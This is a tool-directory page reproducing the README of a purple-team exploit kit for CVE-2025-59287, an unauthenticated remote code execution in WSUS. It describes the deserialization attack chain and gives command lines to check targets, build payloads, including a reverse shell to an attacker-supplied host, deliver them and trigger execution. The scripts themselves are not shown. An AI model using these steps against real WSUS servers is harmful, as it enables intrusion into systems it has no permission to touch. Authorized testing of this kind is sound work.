Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-59287-Exercise-Use — Purple team exercise scripts demonstrating CVE-2025-59287, an unauthenticated RCE in WSUS via malicious deserialization payload injection into the WSUS database. | Kitploit
Tools/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationRed TeamingPayload DevelopmentLabs & Practice
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

Purple team exercise scripts demonstrating CVE-2025-59287, an unauthenticated RCE in WSUS via malicious deserialization payload injection into the WSUS database.

View Repository
66 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-59287 — WSUS Unauthenticated RCE

Purple team exercise scripts for CVE-2025-59287, an unauthenticated remote code execution vulnerability in Windows Server Update Services (WSUS).

Authorized use only. For use in controlled exercise environments against systems you own or have explicit written permission to test.

How It Works

The vulnerability abuses anonymously accessible WSUS SOAP endpoints to inject a malicious deserialization payload into the WSUS database. The payload executes when the WSUS administrative console is opened or a sync is triggered.

  1. WSUS auth service issues a valid token to any anonymous client
  2. Token is exchanged for a reporting session cookie via the client web service
  3. Malicious serialized object is injected into the WSUS database via the reporting service
  4. Payload executes when the WSUS console loads or a sync event fires

Requirements

  • Windows attack box with PowerShell 5.1+
  • Network access to WSUS on port 8530
  • ysoserial.net placed in the ysoserial\Release\ folder (see Setup)

Repository Structure

wsus-cve-2025-59287/
├── 1-check.ps1       # Verify target is vulnerable
├── 2-generate.ps1    # Generate serialized payload blob
├── 3-deliver.ps1     # Deliver payload to WSUS server
├── 4-verify.ps1      # Verify execution and clean up
├── ysoserial/        # Place ysoserial.net release here (not committed)
│   └── Release/
│       └── ysoserial.exe
└── README.md

Setup

Clone or download the repo. Add ysoserial.net so the path matches ysoserial\Release\ysoserial.exe.

Download ysoserial.net from: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 This will trigger Windows Defender by default

Usage

Run all scripts from the repo root.

1 — Check

.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — Generate

File drop (no listener needed, recommended first):

.\2-generate.ps1 -Mode filedrop

Reverse shell:

.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — Deliver

.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — Trigger

On the WSUS server open the administrative console via Start > Windows Server Update Services, or trigger a sync via PowerShell:

$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — Verify and Clean Up

Verify execution:

.\4-verify.ps1

Verify and clean up all artifacts:

.\4-verify.ps1 -Cleanup

From attack box via admin share:

.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

After cleanup remove the exercise computer from the WSUS console under Computers.

Detection Opportunities

References

  • CVE-2025-59287 — Original research: hawktrace.com\
  • ysoserial
  • NIST
  • .NET Exploit/Blob gen
  • tecxx
  • mrk336
Download Tool